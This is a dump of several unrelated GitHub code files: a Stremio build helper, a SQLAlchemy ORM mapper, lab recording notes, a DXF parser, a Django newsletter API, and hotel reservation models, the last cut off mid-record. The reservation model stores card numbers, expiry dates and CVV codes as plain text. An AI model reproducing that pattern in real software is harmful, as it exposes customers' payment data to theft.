Dependencies...\")\n os.system(f\"{self.depend_paths['qt']} --qmldir . abs-dist-win\\\\stremio.exe\")\n print(\"\\ndone.\\n\")\n\n print(\"Build complete! You can find the build in the stremio-shell\\\\abs-dist-win directory.\")","repo_name":"ShoobyDoo/AutoBuildStremio","sub_path":"abs/core/depends.py","file_name":"depends.py","file_ext":"py","file_size_in_byte":15936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42756456449","text":"from sqlalchemy.orm import registry, mapped_column, Mapped, Session, DeclarativeBase\n\nfrom sqlalchemy import Integer, create_engine, Text, select, Boolean, update,BINARY\nfrom .utils import getMockedCategoryData, sortedCategoryList, \\\n createCategoryIndex, getCategoryWeight, getMockedIsGeometry, unfold_sorted_category, unzip_except_dict, unzip_all\nfrom .LiteralEnum import CATEGORY, str2ormtype\nimport ast\n\n\nclass ORM_Mapper(object):\n mapper_registry = registry()\n\n @mapper_registry.mapped\n class CategoryStore(object):\n __tablename__ = \"CategoryStore\"\n\n name = mapped_column(Text, primary_key=True)\n\n category = mapped_column(Text)\n\n isGeometry = mapped_column(Boolean, default=False)\n\n def to_dict(self):\n return {ele.name: getattr(self, ele.name) for ele in\n self.__table__.columns}\n\n def __init__(self):\n self.engine = create_engine(\"sqlite:///./test.db\")\n self.mapper_registry.metadata.create_all(bind=self.engine)\n self.mapper_type = {}\n\n def build_ORM(self):\n \"\"\"\n clear tables except CategoryStore,then try to create all tables in orm.\n :return:\n \"\"\"\n self.mapper_type.clear()\n for table in self.mapper_registry.metadata.sorted_tables:\n if table.name != 'CategoryStore':\n self.mapper_registry.metadata.remove(table)\n\n categoryList = unfold_sorted_category(\n sortedCategoryList(self.__getCategories())\n )\n categoryList = list(\n map(self.__category2classtype, categoryList)\n )\n for category in categoryList:\n self.mapper_registry.mapped(\n category\n )\n self.mapper_type[category.__name__] = category\n\n self.mapper_registry.metadata.create_all(bind=self.engine)\n\n def addCategory(self, category: dict, isGeometry: bool):\n with Session(self.engine) as session:\n session.add(\n self.CategoryStore(\n name=category[\"name\"],\n category=str(category),\n isGeometry=isGeometry\n )\n )\n session.commit()\n return self\n\n def addCategories(self, categories: list[dict], isGeometry: list[bool]):\n with Session(self.engine) as session:\n for index, category in enumerate(categories):\n session.add(\n self.CategoryStore(\n name=category[\"name\"],\n category=str(category),\n isGeometry=isGeometry[index]\n )\n )\n session.commit()\n return self\n\n def deleteCategory(self, category_name: str):\n with Session(self.engine) as session:\n target = session.get(\n self.CategoryStore,\n {\n \"name\": category_name\n }\n )\n session.delete(target)\n session.commit()\n\n def deleteCategoriesWithCondition(self, conditions: list[dict]):\n with Session(self.engine) as session:\n for condition in conditions:\n target = session.get(\n self.CategoryStore,\n condition\n )\n session.delete(target)\n session.commit()\n\n def addDataForOneCategory(self, data_category_name: str, datas: list[dict]):\n with Session(self.engine) as session:\n for data in datas:\n session.add(\n self.mapper_type[data_category_name](\n **data\n )\n )\n session.commit()\n return self\n\n def selectDataFromOneCategory(self, category_name: str, num: int = 20):\n with Session(self.engine) as session:\n if num == -1:\n sql = select(\n self.mapper_type[category_name]\n )\n else:\n sql = select(\n self.mapper_type[category_name]\n ).limit(num)\n return [\n data.to_dict() for data in session.scalars(sql)\n ]\n return self\n\n def selectDatasWithUserDefinedCondition(self, category_name: str, condition: dict):\n\n target_category_class = self.mapper_type[category_name]\n\n with Session(self.engine) as session:\n sql = select(\n self.mapper_type[category_name]\n ).where(\n *[\n statement for statement in map(\n lambda ele: target_category_class.__getattribute__(target_category_class, ele[0]) == ele[1],\n condition.items()\n )\n ]\n )\n return [\n data.to_dict() for data in session.scalars(sql)\n ]\n\n def updateDataInOneCategory(self, category_name: str, update_ids: list[int],\n newer_data: list[dict]):\n with Session(self.engine) as session:\n for index, _id in enumerate(update_ids):\n sql = update(self.mapper_type[category_name]).where(\n self.mapper_type[category_name]._id == _id\n ).values(\n **self.mapper_type[category_name](\n **newer_data[index]).to_dict()\n )\n session.execute(sql)\n session.commit()\n\n def deleteDataInOneCategory(self, category_name: str, del_ids: list[int]):\n with Session(self.engine) as session:\n for _id in del_ids:\n target = session.get(\n self.mapper_type[category_name],\n {\n \"_id\": _id\n }\n )\n session.delete(target)\n session.commit()\n\n def testAddOneData(self, data: dict, data_category_name: str):\n with Session(self.engine) as session:\n t = self.mapper_type[data_category_name]\n session.add(\n t(**data)\n )\n session.commit()\n return self\n\n def getCategories(self):\n \"\"\"\n Expose to the invoker,it will ensure the categories its return are the unfolded categories,which means every category will be mapping\n to the bottom-level of data type.\n :return:\n \"\"\"\n self.__unfoldStoredCategory()\n with Session(self.engine) as session:\n sql = select(self.CategoryStore)\n return [\n category.to_dict() for category in session.scalars(sql)\n ]\n\n def __getCategories(self):\n with Session(self.engine) as session:\n sql = select(self.CategoryStore.category)\n return [\n ast.literal_eval(category) for category in session.scalars(sql)\n ]\n\n def __category2classtype(self, category: dict):\n \"\"\"Category -> ClassType\n \"\"\"\n\n class Base(DeclarativeBase):\n pass\n\n specifications = {\n key: val for key, val in\n map(lambda dic: (dic['keyName'], str2ormtype(dic['keyCategory'])),\n category[CATEGORY.specification])\n }\n if category[CATEGORY.name] == \"坐标\":\n print(1)\n specifications[\"__tablename__\"] = category[CATEGORY.name]\n specifications[\"_id\"] = mapped_column(Integer, primary_key=True,\n nullable=True)\n\n def to_dict(self):\n return {ele.name: getattr(self, ele.name) for ele in\n self.__table__.columns}\n\n def for_update(self):\n return {str(getattr(self, ele.name)): ele.name for ele in\n self.__table__.columns}\n\n def __getattribute__(self, name):\n print(\"self:\", self)\n return self.__getattribute__(name)\n\n specifications[\"to_dict\"] = to_dict\n specifications[\"for_update\"] = for_update\n # specifications[\"__getattribute__\"] = __getattribute__\n return type(\n category[CATEGORY.name],\n (),\n dict(specifications)\n )\n\n def __unfoldStoredCategory(self):\n categories = []\n with Session(self.engine) as session:\n sql = select(self.CategoryStore.category)\n categories = unfold_sorted_category(\n sortedCategoryList(\n [\n ast.literal_eval(category) for category in session.scalars(sql)\n ]\n )\n )\n for category in categories:\n\n sql = update(self.CategoryStore).where(self.CategoryStore.name == category[\"name\"]).values(\n\n category=str(category)\n\n )\n session.execute(sql)\n session.commit()\n\n print(categories)\n\n\nclass DataBaseHanlder(object):\n\n def __init__(self):\n self.ORMMapper = ORM_Mapper()\n self.ORMMapper.build_ORM()\n\n def Add_Categories(self, categories: list[dict], isGeometry: list[bool]):\n \"\"\"\n Category-format:\n {\n \"name\":\"category_name\",\n \"specification\":[{\n {\"keyName\":\"xxx\",\"keyCategory\":\"xxx\"}\n }]\n }\n :param categories:\n :param isGeometry:\n :return:\n \"\"\"\n self.ORMMapper.addCategories(\n categories, isGeometry\n )\n self.ORMMapper.build_ORM()\n\n def Get_Categories(self):\n return self.ORMMapper.getCategories()\n\n def Add_Data(self, category_name, datas: list[dict]):\n \"\"\"\n :param category_name:category's name.For instance:\"Position\"\n :param datas:[{\"spec_name\":\"spec_value}].For instance:[{\"Latitude\":22,\"Longitude\":11}]\n :return:\n \"\"\"\n self.ORMMapper.addDataForOneCategory(\n category_name, datas\n )\n\n def Get_Data_ByNums(self, category_name: str, num: int):\n \"\"\"\n :param category_name:\n :param num:If num == -1,then get all datas\n :return:\n \"\"\"\n return self.ORMMapper.selectDataFromOneCategory(\n category_name, num\n )\n\n def Get_Data_ByCondition(self, category_name: str, condition: dict):\n return self.ORMMapper.selectDatasWithUserDefinedCondition(\n category_name, condition\n )\n\n\nif __name__ == \"__main__\":\n # d = DataBaseHanlder()\n # d.Add_Categories(\n # [{\n # \"name\":\"你好\",\n # \"specification\":[\n # {\"keyName\": \"好感度\", \"keyCategory\": \"Double\"},\n # ]\n # }],[False]\n # )\n a = ORM_Mapper()\n a.build_ORM()\n # categories = unfold_sorted_category(\n # sortedCategoryList(getMockedCategoryData())\n # )\n # a.addCategories(categories,getMockedIsGeometry(4))\n # a.deleteCategoriesWithCondition(\n # [\n # {\n # \"name\":\"hello\"\n # },\n # {\n # \"name\":\"坐标\"\n # }\n # ]\n # )\n # print(a.build_ORM())\n # a.build_ORM()\n # print(a.selectDatasWithUserDefinedCondition(\"谈论点\", {\n # \"回复_坐标_id\": 1,\n # \"回复_id\": 1\n # }))\n # a.addDataForOneCategory(\"坐标\",[\n # {\n # \"纬度\":3,\n # \"经度\":44\n # }\n # ])\n # a.updateDataInOneCategory(\"坐标\",[6],[\n # {\n # \"纬度\": 23,\n # \"经度\": 121,\n # \"_id\":6\n # }\n # ])\n","repo_name":"WendaoLee/toys","sub_path":"JerseyWebGIS/orm/TypeSystem.py","file_name":"TypeSystem.py","file_ext":"py","file_size_in_byte":11630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38276877505","text":"lengths = {'TT4':0, 'TT3':159, 'TT5':159, 'TT6':0}\n\nimpedence = {\n 'TT3':[35.6, 88.2, 75.9, 54.4],\n 'TT4':[29.2, 70.3, 65.8, 51.5],\n 'TT5':[91, 61.8, 87.3, 110],\n 'TT6':[103, 37.8, 184, 67.8]}\n\n\n\nlasercalibration = {\n 0.5:0.90,\n 1.0:1.40,\n 1.5:1.90,\n 2.0:2.35,\n 2.5:2.75,\n 3.0:3.05}\n\n\n'''\n1112 - 931um - Mouse is on the rig with the tetrodes in the Right craniotomy. Waiting for 10 mins for the mouse to wake up and the brain to settle\n\n\n1129 - 931um - possible background visual responses\n\n\nThe electrode impedences must be way too low - I cannot pick up any spikes. I can hear multi-unit activity but I need to remove the electrodes and try cutting them again. \n'''\n\nlengths = {'TT3':117, 'TT4':0, 'TT5':117, 'TT6':0}\n\nimpedence = {\n 'TT3':[399, 445, 447, 500],\n 'TT4':[329, 398, 453, 340],\n 'TT5':[508, 482, 292, 294],\n 'TT6':[512, 330, 405, 345]}\n\n\n\n'''\n\n1342 - 877um - mouse is back on the rig with tetrodes in the right craniotomy again,\nwaiting 10 mins. Excellent visually-responsive neurons\n\n1349 - 1171um - quiet\n\n1353 - 1680um - lots of spikes on TT4, 5, 6\n\n1354 - 1820um - probably through CA1\n\n1406 - 2989 - had many spikes, just got quiet again - waiting for 5 mins\n\n1418 - 3117um - good laser responses on TT4 but no sound responses yet\n\n\n'''\n\nfrom jaratoolbox.test.nick.database import cellDB\nrd = cellDB.Experiment('pinp007', '2015-11-25', 'nick', 'am_tuning')\n\nsite1 = rd.add_site(depth = 3750, goodTetrodes = [3, 4, 5, 6])\nsite1.add_session('14-44-56', None, 'NoiseBurst') #\nsite1.add_session('14-48-12', None, 'LaserPulse') #\nsite1.add_session('14-51-18', None, 'LaserTrain') #\nsite1.add_session('15-07-13', 'a', 'AM') #\n\n\n'''\n2mw - 15-40-02\n1mw - 15-43-38\n0.5mw - 15-46-52\nless - \n\n05mW, 0.1sec soa - \n\n16-08-30 0.05sec soa, all the responses blend together\n16-11-58 - 0.1sec soa, 0.5mW BUT with the filter engaged.\n\n\n\n\n1618 - We have determined that the site we are recording from responds to visual stimuli. The site\nseemed laser responsive, but at long latency and would respond each time to a train of laser pulses\n\nThe neurons here respond to the flashlight.\n\nI am calling it a day and removing the electrodes\n\n\n'''","repo_name":"sjara/jaratest","sub_path":"nick/inforecordings/pinp007/2015-11-25_pinp007recording.py","file_name":"2015-11-25_pinp007recording.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"71677949927","text":"import ezdxf\r\nimport demjson\r\nimport uuid\r\nimport re\r\nimport sys\r\nimport math\r\n\r\n\r\nclass DxfReader:\r\n def __init__(self, abs_tol=20):\r\n self.abs_tol = abs_tol\r\n\r\n def parseDxf(self, dxfPath):\r\n tol = self.abs_tol\r\n dwg = ezdxf.readfile(dxfPath)\r\n msp = dwg.modelspace()\r\n result = {\r\n 'layers': {},\r\n 'entities': {\r\n 'line': {},\r\n 'arc': {},\r\n 'circle': {},\r\n 'hatch': {},\r\n 'dimension': {},\r\n 'mtext': {}\r\n },\r\n 'lineText': {},\r\n 'globalText': {}\r\n }\r\n lines = []\r\n mtexts = []\r\n dimensions = []\r\n self.__result = result\r\n self.__lines = lines\r\n self.__mtexts = mtexts\r\n self.__dimensions = dimensions\r\n for l in dwg.layers:\r\n layer = {\r\n 'id': str(uuid.uuid1()),\r\n 'name': l.dxf.name,\r\n 'color': l.dxf.color\r\n }\r\n result['layers'][layer['id']] = layer\r\n for entity in msp:\r\n self.__parseEntity(entity)\r\n\r\n for line in lines:\r\n start = line['start'].vec2\r\n end = line['end'].vec2\r\n x1 = start.x\r\n y1 = start.y\r\n x2 = end.x\r\n y2 = end.y\r\n theta = math.pi/2-math.atan2(y2-y1, x2-x1)\r\n if start.distance(end) == 0:\r\n continue\r\n a = math.sin(theta)\r\n b = math.cos(theta)\r\n rect = [\r\n ezdxf.math.Vec2(x1+tol*b, y1+tol*a),\r\n ezdxf.math.Vec2(x2+tol*b, y2+tol*a),\r\n ezdxf.math.Vec2(x2-tol*b, y2-tol*a),\r\n ezdxf.math.Vec2(x1-tol*b, y1-tol*a)\r\n ]\r\n for dimension in dimensions:\r\n p = dimension['defpoint'].vec2\r\n p1 = dimension['defpoint2'].vec2\r\n p2 = dimension['defpoint3'].vec2\r\n dx = p.x - p2.x\r\n dy = p.y - p2.y\r\n if abs(dx) < 0.1:\r\n dimension['axis'] = 'x'\r\n dimension['distance'] = dy\r\n elif abs(dy) < 0.1:\r\n dimension['axis'] = 'y'\r\n dimension['distance'] = dx\r\n p1OnLine = ezdxf.math.is_point_on_line_2d(\r\n p1, start, end, False, tol)\r\n p2OnLine = ezdxf.math.is_point_on_line_2d(\r\n p2, start, end, False, tol)\r\n if p1OnLine:\r\n if p1.isclose(start, tol/10):\r\n location = 'start'\r\n elif p1.isclose(end, tol/10):\r\n location = 'end'\r\n else:\r\n location = 'center'\r\n dimension['entity1'] = {\r\n 'id': line['id'], 'location': location}\r\n if p2OnLine:\r\n if p2.isclose(start, tol/10):\r\n location = 'start'\r\n elif p2.isclose(end, tol/10):\r\n location = 'end'\r\n else:\r\n location = 'center'\r\n dimension['entity2'] = {\r\n 'id': line['id'], 'location': location}\r\n if p1OnLine and p2OnLine:\r\n # print(dimension)\r\n line['mingzi'] = dimension['text']['mingzi']\r\n line['qujian'] = dimension['text']['qujian']\r\n line['gongshi'] = dimension['text']['gongshi']\r\n if result['entities']['dimension'].get(dimension['id']):\r\n del result['entities']['dimension'][dimension['id']]\r\n dimension['mingzi'] = dimension['text']['mingzi']\r\n dimension['qujian'] = dimension['text']['qujian']\r\n # dimension['gongshi'] = dimension['text']['gongshi']\r\n for mtext in mtexts:\r\n insert = mtext['insert'].vec2\r\n if (ezdxf.math.is_point_in_polygon_2d(insert, rect, tol) == 1):\r\n line['mingzi'] = mtext['text']['mingzi']\r\n line['qujian'] = mtext['text']['qujian']\r\n line['gongshi'] = mtext['text']['gongshi']\r\n for dimension in dimensions:\r\n del dimension['defpoint']\r\n del dimension['defpoint2']\r\n del dimension['defpoint3']\r\n del dimension['text']\r\n for mtext in mtexts:\r\n mtext['text'] = mtext['text']['text']\r\n return demjson.encode(result)\r\n\r\n def __parseEntity(self, entity):\r\n vid = str(uuid.uuid1())\r\n dxftype = entity.dxftype()\r\n result = self.__result\r\n lines = self.__lines\r\n mtexts = self.__mtexts\r\n dimensions = self.__dimensions\r\n data = {\r\n 'id': vid,\r\n 'type': dxftype,\r\n 'layer': getattr(entity.dxf, 'layer', None),\r\n 'color': getattr(entity.dxf, 'color', None)\r\n }\r\n if dxftype == 'LINE':\r\n data['start'] = entity.dxf.start\r\n data['end'] = entity.dxf.end\r\n result['entities']['line'][vid] = data\r\n lines.append(data)\r\n if dxftype == 'ARC' or dxftype == 'CIRCLE':\r\n data['center'] = entity.dxf.center\r\n data['radius'] = entity.dxf.radius\r\n if dxftype == 'ARC':\r\n data['start_angle'] = entity.dxf.start_angle\r\n data['end_angle'] = entity.dxf.end_angle\r\n data['clockwise'] = False\r\n result['entities']['arc'][vid] = data\r\n else:\r\n result['entities']['circle'][vid] = data\r\n if dxftype == 'MTEXT' or dxftype == 'TEXT':\r\n if dxftype == 'MTEXT':\r\n data['text'] = self.__getText(entity.text)\r\n data['font_size'] = entity.dxf.char_height\r\n anchor = entity.dxf.attachment_point\r\n if anchor == 1:\r\n data['anchor'] = [0, 0]\r\n if anchor == 2:\r\n data['anchor'] = [0.5, 0]\r\n if anchor == 3:\r\n data['anchor'] = [1, 0]\r\n if anchor == 4:\r\n data['anchor'] = [0, 0.5]\r\n if anchor == 5:\r\n data['anchor'] = [0.5, 0.5]\r\n if anchor == 6:\r\n data['anchor'] = [1, 0.5]\r\n if anchor == 7:\r\n data['anchor'] = [0, 1]\r\n if anchor == 8:\r\n data['anchor'] = [0.5, 1]\r\n if anchor == 9:\r\n data['anchor'] = [1, 1]\r\n else:\r\n data['text'] = self.__getText(entity.dxf.text)\r\n data['type'] = 'MTEXT'\r\n data['font_size'] = entity.dxf.height\r\n data['anchor'] = [0, 1]\r\n data['insert'] = entity.dxf.insert\r\n result['entities']['mtext'][vid] = data\r\n mtexts.append(data)\r\n if dxftype == 'DIMENSION':\r\n data['text'] = self.__getText(entity.dxf.text)\r\n data['font_size'] = entity.get_dim_style().dxf.dimtxt\r\n data['dimstyle'] = entity.dxf.dimstyle\r\n data['defpoint'] = entity.dxf.defpoint\r\n data['defpoint2'] = entity.dxf.defpoint2\r\n data['defpoint3'] = entity.dxf.defpoint3\r\n data['dimtype'] = entity.dxf.dimtype\r\n result['entities']['dimension'][vid] = data\r\n dimensions.append(data)\r\n if dxftype in [\"HATCH\"]:\r\n data['paths'] = []\r\n try:\r\n data['bgcolor'] = entity.bgcolor\r\n except:\r\n data['bgcolor'] = (0, 0, 0)\r\n for i in range(len(entity.paths)):\r\n if getattr(entity.paths[i], 'edges', None):\r\n path = {'edges': []}\r\n for j in range(len(entity.paths[i].edges)):\r\n edge = {}\r\n if entity.paths[i].edges[j].EDGE_TYPE == 'LineEdge':\r\n edge['start'] = entity.paths[i].edges[j].start\r\n edge['end'] = entity.paths[i].edges[j].end\r\n path['edges'].append(edge)\r\n data['paths'].append(path)\r\n if getattr(entity.paths[i], 'vertices', None):\r\n path = {'vertices': entity.paths[i].vertices}\r\n data['paths'].append(path)\r\n result['entities']['hatch'][vid] = data\r\n if dxftype == 'LWPOLYLINE':\r\n for vEntity in entity.virtual_entities():\r\n self.__parseEntity(vEntity)\r\n\r\n def __getText(self, rawText):\r\n result = {'text': '', 'rawText': rawText,\r\n 'mingzi': '', 'qujian': '', 'gongshi': ''}\r\n if(rawText is None):\r\n return result\r\n m = re.sub(r'^{|(<>)?}(<>)?$|\\\\[^;]*;', '', rawText)\r\n if m is None:\r\n return result\r\n result['text'] = m\r\n n = m.split(';')\r\n for s in n:\r\n if \"=\" in s:\r\n result['gongshi'] = s\r\n elif '~' in s or '-' in s:\r\n result['qujian'] = s\r\n elif '/' in s:\r\n result['qujian'] = s.replace('/', ', ')\r\n else:\r\n result['mingzi'] = s\r\n return result\r\n\r\n def __extractText(self, entities):\r\n for e in entities:\r\n if e['text'].get('to'):\r\n self.__result['lineText'][e['id']] = e\r\n else:\r\n self.__result['globalText'][e['id']] = e\r\n\r\n\r\ndef debug():\r\n reader = DxfReader()\r\n data = reader.parseDxf('./python/test/input.dxf')\r\n # data = reader.parseDxf('/Users/bfchen/Desktop/shared/n/sd/index/cached/0a77ff12fa711385d23bd6bffde3cd38.dxf')\r\n with open('./python/test/output.json', 'w+') as file:\r\n file = open('./python/test/output.json', 'w+')\r\n file.write(data)\r\n print('done')\r\n\r\n\r\nif len(sys.argv) < 2:\r\n debug()\r\n","repo_name":"Lucilor/ng-cad","sub_path":"src/python/dxfreader.py","file_name":"dxfreader.py","file_ext":"py","file_size_in_byte":10121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11988666848","text":"from rest_framework import viewsets, status\nfrom rest_framework.decorators import action\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\nfrom newsletters.models import NewsLetters\nfrom newsletters.serializers import NewsletterSerializer\nfrom tags.models import Tags\nfrom tags.serializers import TagSerializer\nfrom users.models import Users\nfrom votes.models import Votes\nfrom votes.serializers import VoteSerializer\n\n\nclass NewsViewSet(viewsets.ModelViewSet):\n queryset = NewsLetters.objects.all()\n serializer_class = NewsletterSerializer\n permission_classes = (IsAuthenticated,)\n\n def get_queryset(self):\n query = {}\n for item in self.request.query_params:\n if item in ['users', 'tags']:\n query[item + '__id'] = self.request.query_params[item]\n continue\n query[item + '__icontains'] = self.request.query_params[item]\n self.queryset = self.queryset.filter(**query)\n return super().get_queryset()\n\n @action(methods=['GET', 'POST', 'DELETE'], detail=True)\n def tags(self, request, pk=None):\n newsletter = self.get_object()\n if request.method == 'GET':\n serialized = TagSerializer(newsletter.tags, many=True)\n return Response(status=status.HTTP_200_OK, data=serialized.data)\n\n if request.method == 'POST':\n newsletter_id = request.data['tags']\n for tag_id in newsletter_id:\n tag = Tags.objects.get(id=int(tag_id))\n newsletter.tags.add(tag)\n return Response(status=status.HTTP_201_CREATED)\n\n if request.method == 'DELETE':\n newsletter_id = request.data['tags']\n for tag_id in newsletter_id:\n tag = Tags.objects.get(id=int(tag_id))\n newsletter.tags.remove(tag)\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n @action(methods=['POST'], detail=True)\n def users(self, request, pk=None):\n newsletter = self.get_object()\n users_id = request.data['id']\n\n for user_id in users_id:\n user = Users.objects.get(id=int(user_id))\n newsletter.users.add(users_id)\n return Response(status=status.HTTP_201_CREATED)\n\n # Display the votes of each bulletin\n\n @action(methods=['GET'], detail=True)\n def votes(self, request, pk=None):\n newsletter = self.get_object()\n votes = Votes.objects.filter(newsletter=int(newsletter.id))\n serialized = VoteSerializer(votes, many=True)\n return Response(status=status.HTTP_200_OK, data=serialized.data)\n","repo_name":"jesusmares82-hub/NewsLetter-API","sub_path":"newsletters/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70870348329","text":"from django.db import models\nfrom django.contrib import admin\nfrom django.core.validators import MinValueValidator\nfrom django.forms import ModelForm, Form, Textarea, TextInput, HiddenInput\nfrom django import forms\nfrom datetime import *\n#================================\nROOM_CURRENT = (\n\t('repair', 'Repair'),\n\t('occupied', 'Occupied'),\n\t('clean','Clean'),\n\t('dirty','Dirty')\n)\n\nCOLOR_CHOICES = {\n\t\"white\" : 0xFFFF,\n\t\"black\" : 0x0000,\n\n\t\t\t\t}\n\n\nCOLORLIST =(\n\t(\"White\",\"White\"), \n\t(\"Burlywood\",\"Burlywood\"),\n\t(\"Red\",\"Red\"),\n\t(\"Cyan\",\"Cyan\"),\n\t(\"Blue\",\"Blue\"),\n\t(\"Green\",\"Green\"),\n\t(\"Orange\",\"Orange\"),\n\t(\"RoyalBlue\",\"RoyalBlue\"),\n\t(\"Orchid\",\"Orchid\"),\n\t(\"NavajoWhite\",\"NavajoWhite\"),\n\t(\"Maroon\",\"Maroon\"),\n\t(\"Sienna\",\"Sienna\"),\n\t(\"Yellow\",\"Yellow\"),\n\t(\"Purple\",\"Purple\"),\n\t(\"DarkKhaki\",\"DarkKhaki\"),\n\t(\"Salmon\",\"Salmon\"),\n\t(\"SeaGreen\",\"SeaGreen\"),\n\t(\"OrangeRed\",\"OrangeRed\"),\n\t(\"YellowGreen\",\"YellowGreen\"),\n\t(\"DarkCyan\",\"DarkCyan\"),\n\t(\"Black\",\"Black\"),\n\t(\"HotPink\",\"HotPink\"),\n\t(\"Gray\",\"Gray\"),\n\t(\"Coral\",\"Coral\"),\n\t(\"SaddleBrown\",\"SaddleBrown\"),\n\t(\"SlateBlue\",\"SlateBlue\")\n)\n\nROOM_TYPE_CHOICES = (\n ('standard','Standard'),\n ('deluxe','Deluxe'),\n ('pool_deluxe','Pool Deluxe'),\n ('lanai','Lanai'),\n ('presidential','Presidential'),\n ('manor','Manor'),\n ('suites','Suites')\n )\n\n\nSOURCE_CHOICES = {\n\t('local_fit','Local FIT'),\n\t('tour','Tour Agency'),\n\t('fit','Tour FIT'),\n\n\t('govt','Government'),\n\t('promo','Promotional'),\n\t('rock','Rack Rate'),\n}\n\nRESERVATION_STATUS = (\n\t('notconfirmed','Not Confirmed'),\n\t('confirmed','Confirmed'),\n\t('checkin','Checked In'),\n\t('checkout','Checked Out'),\n\t('notpaid','Not Paid'),\n\t('prepaid' ,'Prepaid'),\n\t('cancel','Cancel'),\n\t('noshow', 'No Show'),\n)\nROOM_STATUS = (\n\t('checkin','Checked In'),\n\t('checkout','Checked Out'),\n\t('clean','Clean'),\n\t('dirty','Dirty'),\n\t('working','Working'),\n\t('none','None'),\n\n\n)\nVENUE_CHOICES = (\n\t('pool','Swimming Pool'),\n\t('confroom2','Conference 2nd'),\n\t('confroom3','Conference 3rd'),\n\t('cafe' ,'Cafe'),\n\t('vcourt','Volleyball Court'),\n\t('lobby','Lobby'),\n\t('back','Back Space'),\t\n\t('other','Other'),\n) \n\n\n#--------------------------------------------------------------------\nclass Rsvn (models.Model):\n\tstatus\t\t=\t models.CharField(max_length=13, choices=RESERVATION_STATUS)\n\n\tfirstname\t=\tmodels.CharField(max_length=30)\n\tlastname \t=\tmodels.CharField(max_length=30)\n\n\tsource \t=\t models.CharField(max_length=20, choices=SOURCE_CHOICES)\n\n\tphone1 \t\t=\tmodels.CharField(max_length=20)\n\tphone2 \t\t=\tmodels.CharField(max_length=20, blank=True)\n\n\tdateIn\t\t=\t models.DateField()\n\tdateOut\t\t=\t models.DateField()\n\n\trooms\t\t= \tmodels.IntegerField(default=1,validators = [ MinValueValidator(1) ])\n\ttype\t\t= \tmodels.CharField(max_length=15, choices=ROOM_TYPE_CHOICES)\n\tbeds\t\t= \tmodels.IntegerField(default=2,validators = [ MinValueValidator(1) ])\n\n\tadult\t\t=\t models.IntegerField(default=1,validators = [ MinValueValidator(1) ])\n\tchild\t\t=\t models.IntegerField(default=0,validators = [ MinValueValidator(0) ])\n\tinfant\t\t=\t models.IntegerField(default=0,validators = [ MinValueValidator(0) ])\n\n\tnotes\t\t=\tmodels.TextField(blank=True)\n\n\tcity \t\t= \tmodels.CharField(max_length=30,blank=True)\n\tcountry \t= \tmodels.CharField(max_length=30)\n\n\temail \t\t= \tmodels.EmailField(blank=True)\n\n\tcredit \t\t= \tmodels.CharField(max_length=30, blank=True )\n\tcreditexp \t= \tmodels.CharField(max_length=8, blank=True )\n\tcreditcvv\t= \tmodels.CharField(max_length=5, blank=True )\n\n\tconfirm\t\t= models.CharField(max_length=20, blank=True)\n\tclerk\t\t= models.CharField(max_length=20, blank=True)\n\n\tdef num_days (self):\n\t\treturn (self.dateOut - self.dateIn).days\n\n\tdef __unicode__(self):\n\t\tfullname = \"%s %s %s - %s\" % (self.firstname, self.lastname,self.dateIn, self.dateOut )\n\t\treturn(fullname)\n\n#--------------------------------------------------------------------\nclass RsvnForm(ModelForm):\n\tclass Meta:\n\t\tmodel= Rsvn\n\t\tfields = '__all__'\n\t\t\n\t\texclude = ['confirm','clerk']\n\t\tlabels = { 'dateIn': 'Check In', 'dateOut' : 'Check Out'}\n\t\twidgets = {\n\n\t\t\t'dateIn'\t:TextInput \t(attrs={'class':'datepicker'}),\n\t\t\t'dateOut' :TextInput \t(attrs={'class':'datepicker'}),\n\t\t\t'notes'\t\t:Textarea\t(attrs={'cols': 20, 'rows': 2}),\n\t\t\t}\n#--------------------------------------------------------------------\nclass RsvnContactForm(ModelForm):\n\tclass Meta:\n\t\tmodel= Rsvn\n\t\tfields = ('status','firstname','lastname', 'source','phone1', 'phone2','city','country','email')\n\n#--------------------------------------------------------------------\n\nclass RsvnCheckForm(ModelForm):\n\tclass Meta:\n\t\tmodel= Rsvn\n\t\tfields = ('dateIn','dateOut', 'type','rooms','beds','adult','child','infant','notes')\n\n\n\n\t\tlabels = { 'dateIn': 'Check In', 'dateOut' : 'Check Out'}\n\t\twidgets = {\n\t\t\t'dateIn'\t:TextInput \t(attrs={'class':'datepicker'}),\n\t\t\t'dateOut' :TextInput \t(attrs={'class':'datepicker'}),\n\t\t\t'notes'\t\t:Textarea\t(attrs={'cols': 20, 'rows': 2}),\n\t\t\t}\n#--------------------------------------------------------------------\nclass Agent (models.Model):\n\tagency\t\t\t=\tmodels.CharField(max_length=30)\n\tcontact\t\t\t= \tmodels.CharField(max_length=30, blank=True)\n\ttelephone\t\t= \tmodels.CharField(max_length=20, blank=True)\n\tfax\t\t\t\t= \tmodels.CharField(max_length=20, blank=True)\n\temail \t\t\t= \tmodels.EmailField(blank=True)\n\tnotes\t\t\t=\tmodels.TextField(blank=True)\n\n\tdef __unicode__(self):\n\t\treturn self.agency\n#--------------------------------------------------------------------\nclass AgentForm(ModelForm) :\n\tclass Meta:\n\t\tmodel= Agent\n#=========================================================\nclass Service (models.Model):\n\trsvn\t\t\t= \tmodels.ForeignKey(Rsvn)\n\tbreakfast\t\t=\tmodels.BooleanField(default=False)\n\tairport\t\t\t=\tmodels.BooleanField(default=False)\n\tdailymaid\t\t=\tmodels.BooleanField(default=False)\n\textrabed\t\t=\tmodels.BooleanField(default=False)\n\tcrib\t\t\t=\tmodels.BooleanField(default=False)\n\tconnect\t\t\t=\tmodels.BooleanField(default=False)\n\tearlyin\t\t\t=\tmodels.BooleanField(default=False)\n\tlateout\t\t\t=\tmodels.BooleanField(default=False)\n\t\n#--------------------------------------------------------------------\nclass ServiceForm(ModelForm) :\n\tclass Meta:\n\t\tmodel= Service\n\n\t\tfields= '__all__'\n\t\tlabels = 